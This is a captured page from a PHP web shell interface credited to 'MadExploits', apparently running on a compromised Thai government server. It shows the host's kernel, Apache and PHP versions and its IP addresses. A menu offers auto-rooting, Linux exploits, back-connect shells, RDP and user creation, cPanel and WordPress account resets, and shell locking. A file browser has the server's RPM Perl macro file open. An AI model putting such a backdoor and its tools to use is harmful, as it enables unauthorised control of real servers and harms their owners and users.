Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
macros.dist
66
B
-rw-r--r--
macros.emacs
268
B
-rw-r--r--
macros.ghc-srpm
122
B
-rw-r--r--
macros.jpackage
8.6
KB
-rw-r--r--
macros.perl
1022
B
-rw-r--r--
macros.prelink
297
B
-rw-r--r--
macros.texlive
173
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : macros.perl
# Sensible Perl-specific RPM build macros. # # Note that these depend on the generic filtering system being in place in # rpm core; but won't cause a build to fail if they're not present. # # Chris Weyl <cweyl@alumni.drew.edu> 2009 # keep track of what "revision" of the filtering we're at. Each time we # change the filter we should increment this. %perl_default_filter_revision 2 # By default, for perl packages we want to filter all files in _docdir from # req/prov scanning, as well as filtering out any provides caused by private # libs in vendorarch/archlib (vendor/core). # # Note that this must be invoked in the spec file, preferably as # "%{?perl_default_filter}", before any %description block. %perl_default_filter %{?filter_setup: %{expand: \ %filter_provides_in %{perl_vendorarch}/.*\\.so$ \ %filter_provides_in -P %{perl_archlib}/(?!CORE/libperl).*\\.so$ \ %filter_from_provides /perl(UNIVERSAL)/d; /perl(DB)/d \ %filter_provides_in %{_docdir} \ %filter_requires_in %{_docdir} \ %filter_setup \ }}
Close